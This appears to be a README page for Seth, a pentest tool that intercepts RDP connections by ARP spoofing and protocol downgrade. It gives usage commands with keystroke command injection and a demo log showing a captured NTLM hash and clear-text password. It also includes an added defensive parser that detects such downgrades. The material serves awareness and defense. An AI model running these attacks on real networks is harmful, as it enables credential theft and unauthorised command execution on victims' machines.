Seth - Perform a MitM Attack and Extract Clear Text Credentials from RDP Connections


Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).

Usage
Run it like this:
$ ./seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]
Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.
The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using - currently it's only reliable with the English US layout. I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16le and Base64 encoded command. However, calc should be pretty universal and gets the job done.
The bash script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can also be called separately. This can be useful if you want to use Seth in combination with Responder. Use Responder to gain a Man-in-the-Middle position and run Seth at the same time. Run seth.py -h for more information:
usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]
               [-j INJECT] -c CERTFILE -k KEYFILE
               target_host [target_port]

RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017

positional arguments:
  target_host           target host of the RDP service
  target_port           TCP port of the target RDP service (default 3389)

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           show debug information
  -f, --fake-server     perform a 'fake server' attack
  -p LISTEN_PORT, --listen-port LISTEN_PORT
                        TCP port to listen on (default 3389)
  -b BIND_IP, --bind-ip BIND_IP
                        IP address to bind the fake service to (default all)
  -g {0,1,3,11}, --downgrade {0,1,3,11}
                        downgrade the authentication protocol to this (default
                        3)
  -j INJECT, --inject INJECT
                        command to execute via key press event injection
  -c CERTFILE, --certfile CERTFILE
                        path to the certificate file
  -k KEYFILE, --keyfile KEYFILE
                        path to the key file
For more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for counter measures.
You can also watch a 20 minute presentation including a demo (starting at 14:00) on Youtube: https://www.youtube.com/watch?v=wdPkY7gykf4
Or watch just the demo (with subtitles) here: https://www.youtube.com/watch?v=JvvxTNrKV-s

Demo
The following output shows the attacker's view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning.

# ./seth.sh eth1 192.168.57.{103,2,102}
███████╗███████╗████████╗██╗  ██╗
██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer
███████╗█████╗     ██║   ███████║   seth@vollmer.syss.de
╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017
███████║███████╗   ██║   ██║  ██║   https://www.syss.de
╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.57.102
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.57.103:50431
Downgrading authentication options from 11 to 3
Enable SSL
alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db: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
Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Connection lost
Connection received from 192.168.57.103:50409
Listening for new connection
Enable SSL
Connection lost
Connection received from 192.168.57.103:50410
Listening for new connection
Enable SSL
Hiding forged protocol request from client
.\alice:ilovebob
Keyboard Layout: 0x409 (English_United_States)
Key press:   LShift
Key press:   s
Key release:                 s
Key release:                 LShift
Key press:   e
Key release:                 e
Key press:   C
Key release:                 C
Key press:   R
Key release:                 R
Key press:   e
Key release:                 e
Key press:   T
Key release:                 T
Connection lost
[*] Cleaning up...
[*] Done.
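The line "Downgrading authentication options from 11 to 3" above is the X.224 security-protocol negotiation being rewritten: 11 is the bitmask a current client sends (TLS, CredSSP and CredSSP with early authorization result), and the -g values 0, 1, 3 and 11 are the same bitmasks. For a defender watching port 3389 traffic or auditing a server, the useful check is whether a client that offered CredSSP/NLA ended up on a weaker layer. The following is an added example, not code from Seth or its author: a parser for the client's X.224 Connection Request and the server's Connection Confirm as specified in MS-RDPBCGR, with that downgrade check on top. All byte strings in it are constructed samples, not real captures; the function names and the result dictionary layout are this example's own.

```python
"""RDP security-protocol negotiation parser with downgrade check.

Added example, not part of Seth. Decodes the client's X.224 Connection Request
(RDP_NEG_REQ) and the server's Connection Confirm (RDP_NEG_RSP or
RDP_NEG_FAILURE) as defined in MS-RDPBCGR and flags the situation the demo
shows: the client offered CredSSP/NLA, but a weaker security layer was
negotiated. All PDUs at the bottom are constructed samples, not real captures.
"""
import struct

# requestedProtocols / selectedProtocol flags (MS-RDPBCGR, RDP Negotiation Request)
PROTOCOL_RDP = 0x00000000        # standard RDP security, no TLS
PROTOCOL_SSL = 0x00000001        # TLS only: the password is typed into the session
PROTOCOL_HYBRID = 0x00000002     # CredSSP (Network Level Authentication)
PROTOCOL_HYBRID_EX = 0x00000008  # CredSSP with early user-authorization result
NLA_FLAGS = PROTOCOL_HYBRID | PROTOCOL_HYBRID_EX

NEG_REQ, NEG_RSP, NEG_FAILURE = 0x01, 0x02, 0x03
X224_CR, X224_CC = 0xE0, 0xD0

FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def _x224_payload(pdu, expected_code):
    """Strip the 4-byte TPKT header and the fixed 7-byte X.224 CR/CC header.

    Returns the variable part (cookie and/or rdpNegData). Raises ValueError on
    bad framing so a truncated capture is not silently misread.
    """
    if len(pdu) < 11 or pdu[0] != 0x03:
        raise ValueError("not a TPKT-framed X.224 PDU")
    tpkt_len = struct.unpack(">H", pdu[2:4])[0]
    if tpkt_len != len(pdu):
        raise ValueError("TPKT length %d does not match %d bytes" % (tpkt_len, len(pdu)))
    li, code = pdu[4], pdu[5] & 0xF0
    # LI counts every TPDU byte after itself: 6 fixed header bytes + variable part
    if 5 + li != len(pdu):
        raise ValueError("X.224 length indicator does not match PDU size")
    if code != expected_code:
        raise ValueError("unexpected X.224 TPDU code 0x%02x" % code)
    return pdu[11:]


def parse_neg_request(pdu):
    """Return requestedProtocols from a client X.224 Connection Request."""
    rest = _x224_payload(pdu, X224_CR)
    # An optional routingToken or cookie ("Cookie: mstshash=<user>\r\n") may
    # precede rdpNegReq; both are terminated by CR LF.
    if rest[:1] != bytes([NEG_REQ]):
        end = rest.find(b"\r\n")
        if end < 0:
            raise ValueError("unterminated cookie/routing token")
        rest = rest[end + 2:]
    if len(rest) < 8:
        return PROTOCOL_RDP  # no rdpNegReq at all: legacy client, standard RDP security
    neg_type, _flags, length, protocols = struct.unpack("<BBHI", rest[:8])
    if neg_type != NEG_REQ or length != 8:
        raise ValueError("malformed RDP_NEG_REQ")
    return protocols


def parse_neg_response(pdu):
    """Return ("selected", protocol) or ("failure", code) from a Connection Confirm."""
    rest = _x224_payload(pdu, X224_CC)
    if len(rest) < 8:
        return "selected", PROTOCOL_RDP  # absent rdpNegData means standard RDP security
    neg_type, _flags, length, value = struct.unpack("<BBHI", rest[:8])
    if length != 8 or neg_type not in (NEG_RSP, NEG_FAILURE):
        raise ValueError("malformed rdpNegData in Connection Confirm")
    return ("selected" if neg_type == NEG_RSP else "failure"), value


def assess_negotiation(client_pdu, server_pdu):
    """Compare what the client offered with what was actually negotiated."""
    requested = parse_neg_request(client_pdu)
    outcome, value = parse_neg_response(server_pdu)
    result = {"requested": requested, "outcome": outcome, "value": value,
              "nla_offered": bool(requested & NLA_FLAGS),
              "nla_negotiated": False, "downgraded": False}
    if outcome == "failure":
        result["reason"] = FAILURE_CODES.get(value, "UNKNOWN_%d" % value)
        return result
    result["nla_negotiated"] = bool(value & NLA_FLAGS)
    # NLA offered but TLS-only or plain RDP security negotiated: the password will
    # be typed into a session that a proxy in the path can read. The cause is a
    # rewritten request (the "11 to 3" step) or a server that cannot do CredSSP.
    result["downgraded"] = result["nla_offered"] and not result["nla_negotiated"]
    return result


# Constructed sample PDUs (not real captures). The client offers 0x0b =
# SSL|HYBRID|HYBRID_EX like a current mstsc; four possible server answers.
CLIENT_CR = bytes.fromhex(
    "03000013"          # TPKT: version 3, length 19
    "0ee00000000000"    # X.224 CR: LI 14, code 0xE0, dst-ref, src-ref, class 0
    "010008000b000000"  # RDP_NEG_REQ: type 1, flags 0, length 8, protocols 0x0b
)
CLIENT_CR_COOKIE = (bytes.fromhex("0300002b" "26e00000000000")
                    + b"Cookie: mstshash=alice\r\n"
                    + bytes.fromhex("010008000b000000"))
SERVER_CC_SSL = bytes.fromhex("03000013" "0ed00000123400" "0200080001000000")
SERVER_CC_NLA = bytes.fromhex("03000013" "0ed00000123400" "0200080002000000")
SERVER_CC_FAIL = bytes.fromhex("03000013" "0ed00000123400" "0300080005000000")
SERVER_CC_LEGACY = bytes.fromhex("0300000b" "06d00000123400")  # no rdpNegData

if __name__ == "__main__":
    for name, cc in [("tls-only", SERVER_CC_SSL), ("nla", SERVER_CC_NLA),
                     ("refused", SERVER_CC_FAIL), ("legacy", SERVER_CC_LEGACY)]:
        print(name, assess_negotiation(CLIENT_CR, cc))
```

Run against the first two PDUs of a connection (for example extracted from a pcap), the "downgraded" flag is the condition under which the demo succeeds. The same parser answers the server-side question from the countermeasures in the paper: a Connection Confirm carrying RDP_NEG_FAILURE with HYBRID_REQUIRED_BY_SERVER, or RDP_NEG_RSP selecting HYBRID or HYBRID_EX, is what a host that enforces NLA returns; PROTOCOL_SSL or an absent rdpNegData is what leaves the typed password exposed.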

Requirements
  • python3
  • tcpdump
  • arpspoof
    arpspoof is part of dsniff
  • openssl

Disclaimer
Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.